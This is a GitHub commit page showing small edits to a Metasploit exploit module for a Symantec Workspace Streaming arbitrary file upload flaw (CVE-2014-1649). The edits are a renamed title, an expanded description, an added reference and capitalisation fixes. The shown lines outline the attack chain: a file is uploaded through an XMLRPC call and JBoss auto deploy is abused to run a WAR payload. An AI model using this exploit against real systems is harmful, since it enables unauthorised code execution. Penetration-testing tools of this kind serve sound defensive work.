Skip to content

Commit 1eeb9af

Browse files
committed
Land rapid7#5271, Symantec Workspace Streaming updates
2 parents cc47f8f + fd56719 commit 1eeb9af

File tree

1 file changed

+8
-6
lines changed

1 file changed

+8
-6
lines changed

modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb

Lines changed: 8 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -15,15 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote
1515

1616
def initialize(info = {})
1717
super(update_info(info,
18-
'Name' => 'Symantec Workspace Streaming Arbitrary File Upload',
18+
'Name' => 'Symantec Workspace Streaming ManagementAgentServer.putFile XMLRPC Request Arbitrary File Upload',
1919
'Description' => %q{
2020
This module exploits a code execution flaw in Symantec Workspace Streaming. The
2121
vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the
2222
as_agent.exe service, which allows for uploading arbitrary files under the server root.
2323
This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order
2424
to achieve remote code execution. This module has been tested successfully on Symantec
25-
Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single
26-
machine deployment, and also in the backend role in a multiple machine deployment.
25+
Workspace Streaming 6.1 SP8 and Windows 2003 SP2, and reported to affect 7.5.0.x.
26+
Abused services listen on a single-machine deployment and also in the backend role in
27+
a multiple-machine deployment.
2728
},
2829
'Author' =>
2930
[
@@ -35,6 +36,7 @@ def initialize(info = {})
3536
[
3637
['CVE', '2014-1649'],
3738
['BID', '67189'],
39+
['OSVDB', '106923'],
3840
['ZDI', '14-127'],
3941
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00']
4042
],
@@ -51,7 +53,7 @@ def initialize(info = {})
5153
register_options(
5254
[
5355
Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file)
54-
OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy)
56+
OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse JBoss auto deploy)
5557
], self.class)
5658
end
5759

@@ -227,11 +229,11 @@ def check
227229
end
228230

229231
def exploit
230-
print_status("#{peer} - Leaking the jboss deployment directory...")
232+
print_status("#{peer} - Leaking the JBoss deployment directory...")
231233
jboss_path =jboss_deploy_path
232234

233235
if jboss_path.nil?
234-
fail_with(Failure::Unknown, "#{peer} - Failed to disclose the jboss deployment directory")
236+
fail_with(Failure::Unknown, "#{peer} - Failed to disclose the JBoss deployment directory")
235237
end
236238

237239
print_status("#{peer} - Building WAR payload...")

0 commit comments

Comments
 (0)